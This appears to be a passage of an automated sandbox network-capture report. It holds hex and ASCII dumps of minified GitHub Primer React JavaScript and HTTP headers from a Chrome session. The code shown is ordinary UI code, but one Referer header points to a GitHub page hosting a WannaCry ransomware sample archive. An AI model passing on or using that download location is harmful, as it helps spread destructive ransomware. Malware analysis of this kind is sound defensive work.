                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 62 74 6e 2e 62 67 22 2c 62 6f 78 53 68 61 64 6f 77 3a 60 24 7b 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 68 61 64 6f 77 73 2e 62 74 6e 2e 73 68 61 64 6f 77 7d 2c 20 24 7b 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 68 61 64 6f 77 73 2e 62 74 6e 2e 69 6e 73 65 74 53 68 61 64 6f 77 7d 60 2c 22 26 3a 68 6f 76 65 72 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 3a 6e 6f 74 28 5b 64 61 74 61 2d 69 6e 61 63 74 69 76 65 5d 29 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 62 74 6e 2e 68 6f 76 65 72 42 67 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 60 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 64 65 66 61 75 6c 74 2d 62 6f 72 64 65 72 43 6f 6c 6f 72 2d 68 6f 76 65 72 2c 20 24 7b 6e 75 6c 6c 3d
                                                                                      Data Ascii: groundColor:"btn.bg",boxShadow:`${null==t?void 0:t.shadows.btn.shadow}, ${null==t?void 0:t.shadows.btn.insetShadow}`,"&:hover:not([disabled]):not([data-inactive])":{backgroundColor:"btn.hoverBg",borderColor:`var(--button-default-borderColor-hover, ${null=
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 61 72 79 2e 73 68 61 64 6f 77 7d 60 2c 22 26 3a 68 6f 76 65 72 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 3a 6e 6f 74 28 5b 64 61 74 61 2d 69 6e 61 63 74 69 76 65 5d 29 22 3a 7b 63 6f 6c 6f 72 3a 22 62 74 6e 2e 70 72 69 6d 61 72 79 2e 68 6f 76 65 72 54 65 78 74 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 62 74 6e 2e 70 72 69 6d 61 72 79 2e 68 6f 76 65 72 42 67 22 7d 2c 22 26 3a 66 6f 63 75 73 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 22 3a 7b 62 6f 78 53 68 61 64 6f 77 3a 22 69 6e 73 65 74 20 30 20 30 20 30 20 33 70 78 22 7d 2c 22 26 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 6e 6f 74 28 5b 64 69 73 61 62 6c 65 64 5d 29 22 3a 7b 62 6f 78 53 68 61 64 6f 77 3a 22 69 6e 73 65 74 20 30 20 30 20 30 20 33 70 78 22 7d 2c 22 26 3a 61 63
                                                                                      Data Ascii: ary.shadow}`,"&:hover:not([disabled]):not([data-inactive])":{color:"btn.primary.hoverText",backgroundColor:"btn.primary.hoverBg"},"&:focus:not([disabled])":{boxShadow:"inset 0 0 0 3px"},"&:focus-visible:not([disabled])":{boxShadow:"inset 0 0 0 3px"},"&:ac
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 67 22 2c 62 6f 78 53 68 61 64 6f 77 3a 60 24 7b 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 68 61 64 6f 77 73 2e 62 74 6e 2e 64 61 6e 67 65 72 2e 73 65 6c 65 63 74 65 64 53 68 61 64 6f 77 7d 60 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 62 74 6e 2e 64 61 6e 67 65 72 2e 73 65 6c 65 63 74 65 64 42 6f 72 64 65 72 22 7d 2c 22 26 3a 64 69 73 61 62 6c 65 64 22 3a 7b 63 6f 6c 6f 72 3a 22 62 74 6e 2e 64 61 6e 67 65 72 2e 64 69 73 61 62 6c 65 64 54 65 78 74 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 62 74 6e 2e 64 61 6e 67 65 72 2e 64 69 73 61 62 6c 65 64 42 67 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 60 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 64 65 66 61 75 6c 74 2d 62 6f 72 64 65 72 43 6f 6c 6f 72 2d 64 69 73 61 62 6c 65 64 2c 20 24 7b 6e
                                                                                      Data Ascii: g",boxShadow:`${null==t?void 0:t.shadows.btn.danger.selectedShadow}`,borderColor:"btn.danger.selectedBorder"},"&:disabled":{color:"btn.danger.disabledText",backgroundColor:"btn.danger.disabledBg",borderColor:`var(--button-default-borderColor-disabled, ${n
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6f 6c 6f 72 3a 22 66 67 2e 6d 75 74 65 64 22 7d 2c 22 26 5b 64 61 74 61 2d 6e 6f 2d 76 69 73 75 61 6c 73 5d 22 3a 7b 63 6f 6c 6f 72 3a 22 61 63 63 65 6e 74 2e 66 67 22 7d 2c 27 26 3a 68 61 73 28 5b 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 42 75 74 74 6f 6e 43 6f 75 6e 74 65 72 22 5d 29 27 3a 7b 63 6f 6c 6f 72 3a 22 62 74 6e 2e 74 65 78 74 22 7d 2c 22 26 3a 64 69 73 61 62 6c 65 64 5b 64 61 74 61 2d 6e 6f 2d 76 69 73 75 61 6c 73 5d 22 3a 7b 63 6f 6c 6f 72 3a 22 70 72 69 6d 65 72 2e 66 67 2e 64 69 73 61 62 6c 65 64 22 2c 22 5b 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 42 75 74 74 6f 6e 43 6f 75 6e 74 65 72 5d 22 3a 7b 63 6f 6c 6f 72 3a 22 69 6e 68 65 72 69 74 22 7d 7d 7d 2c 6f 75 74 6c 69 6e 65 3a 7b 63 6f 6c 6f 72 3a 22 62 74 6e 2e 6f 75 74 6c 69
                                                                                      Data Ascii: olor:"fg.muted"},"&[data-no-visuals]":{color:"accent.fg"},'&:has([data-component="ButtonCounter"])':{color:"btn.text"},"&:disabled[data-no-visuals]":{color:"primer.fg.disabled","[data-component=ButtonCounter]":{color:"inherit"}}},outline:{color:"btn.outli
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 65 2e 63 6f 75 6e 74 65 72 46 67 22 7d 2c 22 26 5b 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 74 72 75 65 5d 22 3a 7b 63 6f 6c 6f 72 3a 22 62 74 6e 2e 6f 75 74 6c 69 6e 65 2e 73 65 6c 65 63 74 65 64 54 65 78 74 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 62 74 6e 2e 6f 75 74 6c 69 6e 65 2e 73 65 6c 65 63 74 65 64 42 67 22 2c 62 6f 78 53 68 61 64 6f 77 3a 60 24 7b 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 73 68 61 64 6f 77 73 2e 62 74 6e 2e 6f 75 74 6c 69 6e 65 2e 73 65 6c 65 63 74 65 64 53 68 61 64 6f 77 7d 60 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 60 76 61 72 28 2d 2d 62 75 74 74 6f 6e 2d 64 65 66 61 75 6c 74 2d 62 6f 72 64 65 72 43 6f 6c 6f 72 2d 61 63 74 69 76 65 2c 20 24 7b 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 63 6f
                                                                                      Data Ascii: e.counterFg"},"&[aria-expanded=true]":{color:"btn.outline.selectedText",backgroundColor:"btn.outline.selectedBg",boxShadow:`${null==t?void 0:t.shadows.btn.outline.selectedShadow}`,borderColor:`var(--button-default-borderColor-active, ${null==t?void 0:t.co
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 53 69 7a 65 3a 22 30 22 2c 27 5b 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 65 78 74 22 5d 27 3a 7b 6c 69 6e 65 48 65 69 67 68 74 3a 22 63 61 6c 63 28 32 30 20 2f 20 31 32 29 22 7d 2c 22 5b 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 42 75 74 74 6f 6e 43 6f 75 6e 74 65 72 5d 22 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 30 22 7d 2c 27 5b 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 62 75 74 74 6f 6e 43 6f 6e 74 65 6e 74 22 5d 20 3e 20 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 27 3a 7b 6d 72 3a 22 34 70 78 22 7d 2c 22 26 5b 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 49 63 6f 6e 42 75 74 74 6f 6e 5d 22 3a 7b 77 69 64 74 68 3a 22 32 38 70 78 22 2c 70 61 64 64 69 6e 67 3a 22 75 6e 73 65 74 22 7d 7d 2c 27 26 5b 64 61 74 61 2d 73 69 7a 65 3d 22
                                                                                      Data Ascii: Size:"0",'[data-component="text"]':{lineHeight:"calc(20 / 12)"},"[data-component=ButtonCounter]":{fontSize:"0"},'[data-component="buttonContent"] > :not(:last-child)':{mr:"4px"},"&[data-component=IconButton]":{width:"28px",padding:"unset"}},'&[data-size="
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6d 70 6f 6e 65 6e 74 3d 22 62 75 74 74 6f 6e 43 6f 6e 74 65 6e 74 22 5d 20 3e 20 3a 6e 6f 74 28 3a 6c 61 73 74 2d 63 68 69 6c 64 29 27 3a 7b 6d 72 3a 22 38 70 78 22 7d 7d 3b 72 65 74 75 72 6e 20 74 7d 2c 76 3d 28 6f 3d 22 63 65 6e 74 65 72 22 29 3d 3e 28 7b 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 3d 3d 3d 6f 3f 22 63 65 6e 74 65 72 22 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 7d 29 3b 76 61 72 20 6d 3d 65 28 33 31 31 37 31 29 2c 68 3d 65 28 37 32 36 31 29 2c 43 3d 65 28 35 34 39 30 31 29 3b 66 75 6e 63 74 69 6f 6e 20 78 28 29 7b 72 65 74 75 72 6e 28 78 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b
                                                                                      Data Ascii: mponent="buttonContent"] > :not(:last-child)':{mr:"8px"}};return t},v=(o="center")=>({justifyContent:"center"===o?"center":"flex-start"});var m=e(31171),h=e(7261),C=e(54901);function x(){return(x=Object.assign?Object.assign.bind():function(o){for(var t=1;
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 7d 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 75 2c 6e 75 6c 6c 29 29 3a 6e 75 6c 6c 3a 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 2e 5a 2c 7b 61 73 3a 22 73 70 61 6e 22 2c 22 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 22 3a 22 74 72 61 69 6c 69 6e 67 56 69 73 75 61 6c 22 2c 73 78 3a 7b 2e 2e 2e 54 7d 7d 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 43 2e 5a 2c 7b 22 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 22 3a 22 42 75 74 74 6f 6e 43 6f 75 6e 74 65 72 22 7d 2c 66 29 29 29 2c 67 26 26 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 61 2e 5a 2c 7b 61 73 3a 22 73 70 61 6e 22 2c 22 64 61 74 61 2d 63 6f 6d 70 6f 6e 65 6e 74 22 3a 22 74 72 61 69 6c 69 6e 67 41 63 74 69 6f 6e 22 2c 73 78 3a 7b 2e 2e 2e 54 7d 7d 2c 6e 2e 63 72 65 61 74 65
                                                                                      Data Ascii: },n.createElement(u,null)):null:n.createElement(a.Z,{as:"span","data-component":"trailingVisual",sx:{...T}},n.createElement(C.Z,{"data-component":"ButtonCounter"},f))),g&&n.createElement(a.Z,{as:"span","data-component":"trailingAction",sx:{...T}},n.create
                                                                                      2024-03-23 14:47:24 UTC1224INData Raw: 74 49 64 3a 22 73 63 2d 31 31 6a 68 6d 37 61 2d 30 22 7d 29 28 5b 22 22 2c 22 22 5d 2c 28 7b 69 73 56 69 73 69 62 6c 65 3a 6f 3d 21 31 7d 29 3d 3e 6f 3f 61 2e 5a 3a 60 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2d 31 70 78 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 20 30 2c 20 30 2c 20 30 29 3b 0a 20 20 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a
                                                                                      Data Ascii: tId:"sc-11jhm7a-0"})(["",""],({isVisible:o=!1})=>o?a.Z:` position: absolute; width: 1px; height: 1px; padding: 0; margin: -1px; overflow: hidden; clip: rect(0, 0, 0, 0); white-space: nowrap;


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      49192.168.2.1649753185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC697OUTGET /assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-1501d3ef83c2.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 36952
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 12 Mar 2024 23:03:14 GMT
                                                                                      ETag: 0x8DC42E898B0B6B0
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 421479
                                                                                      X-Served-By: cache-iad-kjyo7100048-IAD, cache-ewr18151-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 45, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 3240e55f97137a4f0133c35ee508c3eaf5977d88
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 41 63 74 69 6f 6e 4c 69 73 74 5f 69 6e 64 65 78 5f 6a 73 22 5d 2c 7b 34 38 30 33 30 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 2e 64 28 74 2c 7b 4e 3a 28 29 3d 3e 72 7d 29 3b 6c 65 74 20 6e 3d 7b 22 6f 75 74 73 69 64 65 2d 74 6f 70 22 3a 5b 22 6f 75 74 73 69 64 65 2d 62 6f 74 74 6f 6d 22 2c 22 6f 75 74 73 69 64 65 2d 72 69 67 68 74 22 2c 22 6f 75 74 73 69 64 65 2d 6c 65 66 74 22 2c 22 6f 75 74 73 69 64 65 2d 62 6f 74
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_ActionList_index_js"],{48030:(e,t,o)=>{o.d(t,{N:()=>r});let n={"outside-top":["outside-bottom","outside-right","outside-left","outside-bot
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2b 72 2c 6c 65 66 74 3a 6e 2e 6c 65 66 74 2b 61 2c 77 69 64 74 68 3a 6e 2e 77 69 64 74 68 2d 6c 2d 61 2c 68 65 69 67 68 74 3a 4d 61 74 68 2e 6d 61 78 28 6e 2e 68 65 69 67 68 74 2d 72 2d 73 2c 6f 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3f 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3a 2d 31 2f 30 29 7d 7d 28 72 29 2c 64 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 72 29 2c 63 3d 72 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2c 5b 75 2c 70 5d 3d 5b 64 2e 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 2c 64 2e 62 6f 72 64 65 72 4c 65 66 74 57 69 64 74 68 5d 2e 6d 61 70 28 65 3d 3e 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 7c 7c 30 29 2c 66 3d 7b 74 6f 70 3a 63 2e 74 6f 70 2b 75 2c 6c 65 66 74 3a 63 2e 6c 65
                                                                                      Data Ascii: +r,left:n.left+a,width:n.width-l-a,height:Math.max(n.height-r-s,o===document.body?window.innerHeight:-1/0)}}(r),d=getComputedStyle(r),c=r.getBoundingClientRect(),[u,p]=[d.borderTopWidth,d.borderLeftWidth].map(e=>parseInt(e,10)||0),f={top:c.top+u,left:c.le
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 75 6c 6c 21 3d 3d 28 74 3d 65 2e 73 69 64 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 61 2e 73 69 64 65 2c 73 3d 6e 75 6c 6c 21 3d 3d 28 6f 3d 65 2e 61 6c 69 67 6e 29 26 26 76 6f 69 64 20 30 21 3d 3d 6f 3f 6f 3a 61 2e 61 6c 69 67 6e 3b 72 65 74 75 72 6e 7b 73 69 64 65 3a 6c 2c 61 6c 69 67 6e 3a 73 2c 61 6e 63 68 6f 72 4f 66 66 73 65 74 3a 6e 75 6c 6c 21 3d 3d 28 6e 3d 65 2e 61 6e 63 68 6f 72 4f 66 66 73 65 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 22 69 6e 73 69 64 65 2d 63 65 6e 74 65 72 22 3d 3d 3d 6c 3f 30 3a 61 2e 61 6e 63 68 6f 72 4f 66 66 73 65 74 2c 61 6c 69 67 6e 6d 65 6e 74 4f 66 66 73 65 74 3a 6e 75 6c 6c 21 3d 3d 28 69 3d 65 2e 61 6c 69 67 6e 6d 65 6e 74 4f 66 66 73 65 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 69 3f 69 3a 22 63 65
                                                                                      Data Ascii: ull!==(t=e.side)&&void 0!==t?t:a.side,s=null!==(o=e.align)&&void 0!==o?o:a.align;return{side:l,align:s,anchorOffset:null!==(n=e.anchorOffset)&&void 0!==n?n:"inside-center"===l?0:a.anchorOffset,alignmentOffset:null!==(i=e.alignmentOffset)&&void 0!==i?i:"ce
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 74 6f 70 3a 73 2c 6c 65 66 74 3a 64 7d 7d 7d 2c 35 31 38 36 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 2e 64 28 74 2c 7b 4f 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 6e 3d 6f 28 36 37 32 39 34 29 3b 6c 65 74 20 69 3d 6e 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 7b 7d 29 7d 2c 39 32 39 39 32 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 2e 64 28 74 2c 7b 69 3a 28 29 3d 3e 73 7d 29 3b 76 61 72 20 6e 3d 6f 28 36 37 32 39 34 29 2c 69 3d 6f 28 34 32 34 38 33 29 2c 72 3d 6f 28 34 32 33 37 39 29 2c 61 3d 6f 28 39 39 39 36 29 2c 6c 3d 6f 2e 6e 28 61 29 3b 6c 65 74 20 73 3d 28 7b 73 78 3a 65 3d 7b 7d 7d 29 3d 3e 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 69 2e 5a 2c 7b 61 73 3a 22 6c 69 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 73 78 3a 6c 28 29 28
                                                                                      Data Ascii: top:s,left:d}}},5186:(e,t,o)=>{o.d(t,{O:()=>i});var n=o(67294);let i=n.createContext({})},92992:(e,t,o)=>{o.d(t,{i:()=>s});var n=o(67294),i=o(42483),r=o(42379),a=o(9996),l=o.n(a);let s=({sx:e={}})=>n.createElement(i.Z,{as:"li","aria-hidden":"true",sx:l()(
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 64 65 6e 3a 69 3d 21 31 2c 2e 2e 2e 72 7d 2c 73 29 3d 3e 7b 76 61 72 20 64 3b 6c 65 74 20 66 3d 6e 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 3b 28 30 2c 75 2e 7a 29 28 73 2c 66 29 3b 6c 65 74 7b 68 65 61 64 69 6e 67 49 64 3a 67 2c 76 61 72 69 61 6e 74 3a 6d 7d 3d 6e 2e 75 73 65 43 6f 6e 74 65 78 74 28 68 29 2c 7b 63 6f 6e 74 61 69 6e 65 72 3a 79 7d 3d 6e 2e 75 73 65 43 6f 6e 74 65 78 74 28 61 2e 4f 29 3b 72 65 74 75 72 6e 22 41 63 74 69 6f 6e 4d 65 6e 75 22 21 3d 3d 79 7c 7c 28 30 2c 76 2e 6b 29 28 21 31 29 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 2e 5a 2c 7b 69 73 56 69 73 69 62 6c 65 3a 21 69 7d 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 70 2e 5a 2c 77 28 7b 61 73 3a 65 2c 72 65 66 3a 66 2c 69 64 3a 6e 75 6c 6c 21 3d 3d 28 64 3d 72 2e
                                                                                      Data Ascii: den:i=!1,...r},s)=>{var d;let f=n.useRef(null);(0,u.z)(s,f);let{headingId:g,variant:m}=n.useContext(h),{container:y}=n.useContext(a.O);return"ActionMenu"!==y||(0,v.k)(!1),n.createElement(b.Z,{isVisible:!i},n.createElement(p.Z,w({as:e,ref:f,id:null!==(d=r.
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 6f 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6f 2c 6e 29 26 26 28 65 5b 6e 5d 3d 6f 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6c 65 74 20 44 3d 6e 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 7b 67 72 6f 75 70 48 65 61 64 69 6e 67 49 64 3a 76 6f 69 64 20 30 2c 73 65 6c 65 63 74 69 6f 6e 56 61 72 69 61 6e 74 3a 76 6f 69 64 20 30 7d 29 2c 4c 3d 28 7b 74 69 74 6c 65 3a 65 2c 76 61 72 69 61 6e 74 3a 74 3d 22 73 75 62 74 6c 65 22 2c 61 75 78 69 6c 69 61 72 79 54 65 78 74 3a 6f 2c 73 65
                                                                                      Data Ascii: .length;t++){var o=arguments[t];for(var n in o)Object.prototype.hasOwnProperty.call(o,n)&&(e[n]=o[n])}return e}).apply(this,arguments)}let D=n.createContext({groupHeadingId:void 0,selectionVariant:void 0}),L=({title:e,variant:t="subtle",auxiliaryText:o,se
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6f 70 3a 22 31 70 78 20 73 6f 6c 69 64 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 22 31 70 78 20 73 6f 6c 69 64 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 6e 65 75 74 72 61 6c 2e 6d 75 74 65 64 22 7d 7d 3b 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6e 2e 46 72 61 67 6d 65 6e 74 2c 6e 75 6c 6c 2c 75 3f 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 43 2e 5a 2c 4f 28 7b 73 78 3a 67 2c 72 6f 6c 65 3a 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 7d 2c 73 29 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 2c 7b 69 64 3a 66 7d 2c 6e 75 6c 6c 21 3d 6f 3f 6f 3a 72 29 2c 69 26 26 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 2c 6e 75
                                                                                      Data Ascii: op:"1px solid",borderBottom:"1px solid",borderColor:"neutral.muted"}};return n.createElement(n.Fragment,null,u?n.createElement(C.Z,O({sx:g,role:"presentation","aria-hidden":"true"},s),n.createElement("span",{id:f},null!=o?o:r),i&&n.createElement("span",nu
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 6d 61 72 67 69 6e 52 69 67 68 74 3a 32 7d 2c 65 29 7d 2c 74 29 29 3b 48 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 4c 65 61 64 69 6e 67 56 69 73 75 61 6c 43 6f 6e 74 61 69 6e 65 72 22 3b 6c 65 74 20 5a 3d 28 7b 73 78 3a 65 3d 7b 7d 2c 2e 2e 2e 74 7d 29 3d 3e 7b 6c 65 74 7b 76 61 72 69 61 6e 74 3a 6f 2c 64 69 73 61 62 6c 65 64 3a 69 2c 69 6e 61 63 74 69 76 65 3a 72 7d 3d 6e 2e 75 73 65 43 6f 6e 74 65 78 74 28 66 29 3b 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 48 2c 50 28 7b 73 78 3a 63 28 29 28 7b 63 6f 6c 6f 72 3a 67 28 6f 2c 69 2c 72 29 2e 69 63 6f 6e 43 6f 6c 6f 72 2c 73 76 67 3a 7b 66 6f 6e 74 53 69 7a 65 3a 30 7d 2c 27 5b 64 61 74 61 2d 76 61 72
                                                                                      Data Ascii: tems:"center",flexShrink:0,marginRight:2},e)},t));H.displayName="LeadingVisualContainer";let Z=({sx:e={},...t})=>{let{variant:o,disabled:i,inactive:r}=n.useContext(f);return n.createElement(H,P({sx:c()({color:g(o,i,r).iconColor,svg:{fontSize:0},'[data-var
